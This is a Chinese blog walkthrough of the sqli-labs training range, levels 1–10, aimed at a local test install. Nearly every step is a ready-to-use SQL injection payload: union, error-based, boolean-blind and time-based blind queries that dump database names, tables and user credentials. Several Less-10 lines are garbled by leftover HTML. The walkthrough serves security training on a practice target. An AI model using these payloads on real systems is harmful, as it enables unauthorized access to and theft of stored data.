sqli-labs靶场通关攻略(1-10关)

最新推荐文章于 2025-02-01 22:15:36 发布
最新推荐文章于 2025-02-01 22:15:36 发布
阅读量921 收藏 6
点赞数 13
CC 4.0 BY-SA版权
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141547690

Less-1

sql手工注入攻击流程

步骤一:确定攻击点,确定网站可以注入的参数

http://127.0.0.1/Less-1/?id=1

步骤二:判断闭合方式 ' --+

步骤三:判断字段列数 order by

1.
http://127.0.0.1/Less-1/?id=1' order by 3 --+ 页面正常 说明存在3列

2.
http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常 说明存在3列

步骤四:联合查询 查当前数据库名,数据库用户

1.联合查询3列

http://127.0.0.1/Less-1/?id=1' union select 1,2,3 --+  页面显示的是id=1的数据,没有显示我们联合查询的数据

2.页面上显示联合查询的回显点

把前面查询的id的数据改成不存在的,比如-1

http://127.0.0.1/Less-1/?id=-1' union select 1,2,3 --+

3.联合查询数据库名和用户名

http://127.0.0.1/Less-1/?id=-1' union select 1,database(),user() --+

步骤五:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七:查询表中所有的数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,'-',username,'-',password) from users --+

Less-2

报错注入流程

前提:只要网站有报错语句就能进行报错查询

步骤一:http://127.0.0.1/Less-2/?id=1' 跟个单引号引起报错 说明页面有报错语句的位置

步骤二:测试闭合注释为

http://127.0.0.1/Less-2/?id=1--+

步骤三:http://127.0.0.1/Less-2/?id=1 and updatexml(1,1,1) --+ 使用报错函数,报错函数里面三个参数,写三个1占位置

步骤四:http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,1),1) --+ 我们可以操控的是第二个参数的位置,所以第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置

步骤五:http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select database())),1) --+我们可以操控的地方也是第二个参数的位置 把第二个参数的位置换成(),里面写我们的子查询语句 成功查出数据库名 后面查什么在子查询括号里面查就行

步骤六:查表名:http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=’security‘)),1) --+

步骤七:查列名:'http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

步骤八:查具体的username和password

http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

Less-3

步骤一:确定攻击点,确定网站可以注入的参数

步骤二:判断闭合方式 ') --+

 步骤三:判断字段列数 order by

1.
http://127.0.0.1/Less-3/?id=1') order by 3 --+ 页面正常 说明存在3列

2.
http://127.0.0.1/Less-3/?id=1') order by 4 --+ 页面不正常 说明存在3列

步骤四:联合查询 查当前数据库名,数据库用户

1.联合查询3列

http://127.0.0.1/Less-3/?id=1') union select 1,2,3 --+  页面显示的是id=1的数据,没有显示我们联合查询的数据

2.页面上显示联合查询的回显点

把前面查询的id的数据改成不存在的,比如-1

http://127.0.0.1/Less-3/?id=-1') union select 1,2,3 --+

3.联合查询数据库名和用户名

http://127.0.0.1/Less-3/?id=-1') union select 1,database(),user() --+

步骤五:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七:查询表中所有的数据

http://127.0.0.1/Less-3/?id=-1') union select 1,2,group_concat(id,'~',username,'~',password) from users --+

Less-4

步骤一:确定攻击点,确定网站可以注入的参数

步骤二:判断闭合方式 ") --+

 步骤三:判断字段列数 order by

1.
http://127.0.0.1/Less-4/?id=1") order by 3 --+ 页面正常 说明存在3列

2.
http://127.0.0.1/Less-4/?id=1") order by 4 --+ 页面不正常 说明存在3列

步骤四:联合查询 查当前数据库名,数据库用户

1.联合查询3列

http://127.0.0.1/Less-4/?id=1") union select 1,2,3 --+  页面显示的是id=1的数据,没有显示我们联合查询的数据

2.页面上显示联合查询的回显点

把前面查询的id的数据改成不存在的,比如-1

http://127.0.0.1/Less-4/?id=-1") union select 1,2,3 --+

3.联合查询数据库名和用户名

http://127.0.0.1/Less-4/?id=-1") union select 1,database(),user() --+

步骤五:联合查询 查出网站的数据库里面的所有表名

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六:联合查询 查出users表里面的所有列

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七:查询表中所有的数据

http://127.0.0.1/Less-4/?id=-1") union select 1,2,group_concat(id,'~',username,'~',password) from users --+

Less-5

 步骤一:http://127.0.0.1/Less-5/?id=1' 跟个单引号引起报错 说明页面有报错语句的位置

步骤二:测试闭合注释为

http://127.0.0.1/Less-5/?id=1'--+

步骤三:http://127.0.0.1/Less-5/?id=1' and updatexml(1,1,1) --+ 使用报错函数,报错函数里面三个参数,写三个1占位置

步骤四:http://127.0.0.1/Less-5/?id=1' and updatexml(1,concat(1,1),1) --+ 我们可以操控的是第二个参数的位置,所以第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置

步骤五:http://127.0.0.1/Less-5/?id=1' and updatexml(1,concat(1,(select database())),1) --+我们可以操控的地方也是第二个参数的位置 把第二个参数的位置换成(),里面写我们的子查询语句 成功查出数据库名 后面查什么在子查询括号里面查就行

步骤六:查表名:http://127.0.0.1/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=’security‘)),1) --+

步骤七:查列名:'http://127.0.0.1/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

步骤八:查具体的username和password

http://127.0.0.1/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

Less-6

步骤一:http://127.0.0.1/Less-6/?id=1"跟个双引号引起报错 说明页面有报错语句的位置

步骤二:测试闭合注释为"--+

步骤三:http://127.0.0.1/Less-6/?id=1" and extractvalue(1,1)  --+使用报错函数,报错函数里面两个参数,写两个1占位置

步骤四:http://127.0.0.1/Less-6/?id=1" and extractvalue(1,concat(1,1)) --+我们可以操控的是第二个参数的位置,所以第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置

步骤五: http://127.0.0.1/Less-6/?id=1" and extractvalue(1,concat(1,database())) --+我们可以操控的地方也是第二个参数的位置 把第二个参数的位置换成(),里面写我们的子查询语句 成功查出数据库名 后面查什么在子查询括号里面查就行

步骤六:查表名http://127.0.0.1/Less-6/?id=1" and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' ))) --+

步骤七:查列名

http://127.0.0.1/Less-6/?id=1" and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+

步骤八:查具体的username和password

http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(username,password)%20from%20users)))%20--+

Less-7

步骤一:判断闭合方式

' ))--+ 闭合成功 页面正常http://127.0.0.1/Less-7/?id=1'))--+

步骤二:页面只有ture和flase两种情况,所以需要使用布尔盲注

判断数据库长度大于7 页面正常 说明数据库长度大于7:http://127.0.0.1/Less-7/?id=1')) and length(database())>7 --+

判断数据库长度大于8 页面异常 说明数据库长度等于8:

http://127.0.0.1/Less-7/?id=1')) and length(database())>8 --+

步骤三:判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114 :

http://127.0.0.1/Less-7/?id=1')) and ascii(substr(database(),1,1))>114--+

判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

http://127.0.0.1/Less-1/?id=1')) and ascii(substr(database(),1,1))>115--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤四:查security数据库中第一张表的第一位字符

http://127.0.0.1/Less-7/?id=1' )) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

http://127.0.0.1/Less-7/?id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤五:判断users表中第一个字段的第一位字符

http://127.0.0.1/Less-7/?id=1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

http://127.0.0.1/Less-7/?id=1')) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

步骤六:判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-7/?id=1')) and ascii(substr((select username from users limit 0,1),1,1))>67--+

http://127.0.0.1/Less-7/?id=1')) and ascii(substr((select username from users limit 0,1),1,1))>68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

Less-8

布尔盲注流程

步骤一:判断闭合方式

不正常页面 http://127.0.0.1/Less-8/?id=1'

' --+ 闭合成功 页面正常 http://127.0.0.1/Less-8/?id=1' --+

步骤二:页面只有ture和flase两种情况,所以需要使用布尔盲注

判断数据库长度大于7 页面正常 说明数据库长度大于7:http://127.0.0.1/Less-8/?id=1' and length(database())>7--+

判断数据库长度大于8 页面异常 说明数据库长度等于8:http://127.0.0.1/Less-8/?id=1' and length(database())>8--+

步骤三:判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114 :http://127.0.0.1/Less-8/?id=1' and ascii(substr(database(),1,1))>114--+

判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

http://127.0.0.1/Less-8/?id=1' and ascii(substr(database(),1,1))>115--+

数据库第一位字符ascii码为115 's'。

判断数据库第二位字符

http://127.0.0.1/Less-8/?id=1' and ascii(substr(database(),2,1))>100--+


http://127.0.0.1/Less-8/?id=1' and ascii(substr(database(),2,1))>101--+

说明数据库第二位字符的ascii码长度大于100不大于101 那么就是等于101 'e'。

............................最终得出数据库名为security

步骤四:查security数据库中第一张表的第一位字符

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤五:判断users表中第一个字段的第一位字符

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+



说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

步骤六:判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))>67--+

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))>68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

Less-9

时间盲注流程

if(布尔盲注语句,sleep(3),1) //if判断语句,当布尔盲注语句成立时,执行sleep(3),否则执行1。

步骤一:检查发现id等于多少都没有报错,可以使用时间盲注

步骤二:进行时间盲注的判断发现响应时间为sleep函数执行的时间则存在

http://127.0.0.1/Less-9/?id=1' and sleep(3)--+

步骤三:判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr(database(),1,1))>114 ,sleep(3),1)--+


 

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115 ,sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤四:查security数据库中第一张表的第一位字符

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒访问

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤五:判断users表中第一个字段的第一位字符

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104 ,sleep(3),1)--+

页面延迟三秒访问

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105 ,sleep(3),1)--+

页面正常访问

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

步骤六:判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>67 ,sleep(3),1)--+

http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>68 ,sleep(3),1)--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

Less-10

步骤一:检查发现id等于多少都没有报错,可以使用时间盲注

步骤二:进行时间盲注的判断发现响应时间为sleep函数执行的时间则存在

http://127.0.0.1/Less-10/?id=1" and sleep(3)--+

步骤三:判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr(database(),1,1))>114 ,sleep(3),1)--+" target="_blank">114 ,sleep(3),1)--+" target="_blank">http://127.0.0.1/Less-10/?id=1" and if(ascii(substr(database(),1,1))>114 ,sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr(database(),1,1))>115 ,sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤四:查security数据库中第一张表的第一位字符

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+" target="_blank">100 ,sleep(3),1)--+" target="_blank">http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒访问

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤五:判断users表中第一个字段的第一位字符

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104 ,sleep(3),1)--+" target="_blank">104 ,sleep(3),1)--+" target="_blank">http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104 ,sleep(3),1)--+

页面延迟三秒访问

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105 ,sleep(3),1)--+

页面正常访问

说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

步骤六:判断username列的第一条数据的第一个字符

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select username from users limit 0,1),1,1))>67 ,sleep(3),1)--+" target="_blank">67 ,sleep(3),1)--+" target="_blank">http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select username from users limit 0,1),1,1))>67 ,sleep(3),1)--+

http://127.0.0.1/Less-10/?id=1" and if(ascii(substr((select username from users limit 0,1),1,1))>68 ,sleep(3),1)--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3331
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新通关教程!!!!
SQLi-Labs靶场通关笔记(1~21
trdtyvu的博客
07-06 3131
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个卡,其中卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择卡。
Sqlilabs靶场1-10详解(Get请求式)
爱吃仡坨的Blog
10-16 2810
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labs靶场通关攻略
test_zpx的博客
08-14 4607
Good Good Study,Day Day Up!
sqli-labs靶场通关秘籍分享(1-10
weixin_45585955的博客
04-16 3011
一、 1SQL注入原理:sql语句未经查询直接带入数据库查新,sql注入攻击其实就是服务端的攻击,它与操作系统、服务器类型、脚本语言无 2、sql注入类型:分为数字型、字符型、搜索型、xx型 3、注入提交方式:get提交、post提交、cookie提交。 4、注入攻击提交支持的类型 union注入、information_schema、宽字节注入、报错注入、盲注,这里的盲注分为三种,分别是 布尔型盲注、时间型盲注、报错型盲注。 updatexml注入分为 insert注入、update注入
sqli-labs 靶场通关1-10
知世郎
10-15 2932
第七当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之前的卡不一样,之前都有报错信息。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s。id=2'的时候看到页面报错信息。
Sqli-labs靶场通关1-20
2301_77977773的博客
07-03 1121
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sqli-labs靶场通关
最新发布
2401_87576048的博客
02-01 1227
mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labssqli-labs 靶场通关1-16)
m0_71944965的博客
09-02 712
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场sqli-labs 靶场通关1-16)sqli-labs第一 sqli-labs第一 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
sql-labs通关教程
m0_62274649的博客
10-30 986
sqllabs搭建
sqli-labs1-10
永远相信美好的事情即将发生
02-03 1658
Less-1 进入Less-1卡,提示输入id为一个数值 尝试提交id=1,回显login name 和password 尝试提交id=1’,回显报错,说明存在注入点,根据回显内容’1’’ LIMIT 0,1(外面一层单引号表示引用,把它去掉),可判断提交的数据类型为字符型,由此可猜测sql语句:select * from 某表 where id='某个值' limit 0,1 接下来利用order by判断表中有几列,提交?id=1' order by 3 --+回显正常,提交?id=1' ord
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 4289
sqli-labs靶场通关(1-10)
详细sqli-labs1-20)通关讲解
m0_57928318的博客
05-18 7034
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs通关详解(1-20
2302_81105681的博客
04-11 3665
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs(1-10)
剁椒鱼头没剁椒的博客
10-06 1570
Less-1   测试流程   1.测试注入点   注意:后续的流程和第一一样,可以直接复制第一命令进行测试。   注意:后续的流程和第一一样,可以直接复制第一命令进行测试。   注意:后续的流程和第一一样,可以直接复制第一命令进行测试。?id=1’ and 1=2+ 通过文章开头的多种字段类型进行测试发现’ 能够闭合。 通过测试发现第五属于字符型型注入。   注:这里若是不了解什么是布尔盲注可以CSDN上搜索。   或者使用ascii函数
SQL注入靶场 RedTiger通关教程(level1~level10)
0xuu的博客
07-07 1517
SQL注入靶场RedTiger's Hackit 通关教程;RedTiger通关教程(level1~level10)
SQL注入靶场搭建及过关教程
weixin_48042647的博客
03-07 2133
SQL注入靶场搭建及过关教程 1.需要环境: 下载安装VMware,在虚拟机上布置虚拟机win7或winXP(个人推荐win7,使用界面与现在的win10界面较为相似,使用起来比较舒适) Win7镜像下载地址:https://msdn.itellyou.cn/ 2.需要工具: PHPstudy,下载地址:https://www.xp.cn/download.html SQL靶场,下载地址: https://pan.baidu.com/s/1yrIJmkREIuaiB7E1Z3ROpA 提取码: 772u
SQL注入:sqli-labs靶场通关1-5
kobelnfn的博客
12-27 1178
我的sqli-labs靶场学习经验分享
SQL注入之sqli-labs靶场超详细通关(less-1~less-4:GET_非盲注)
2301_77091612的博客
10-10 2444
最适合小白学习的sql简单注入流程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值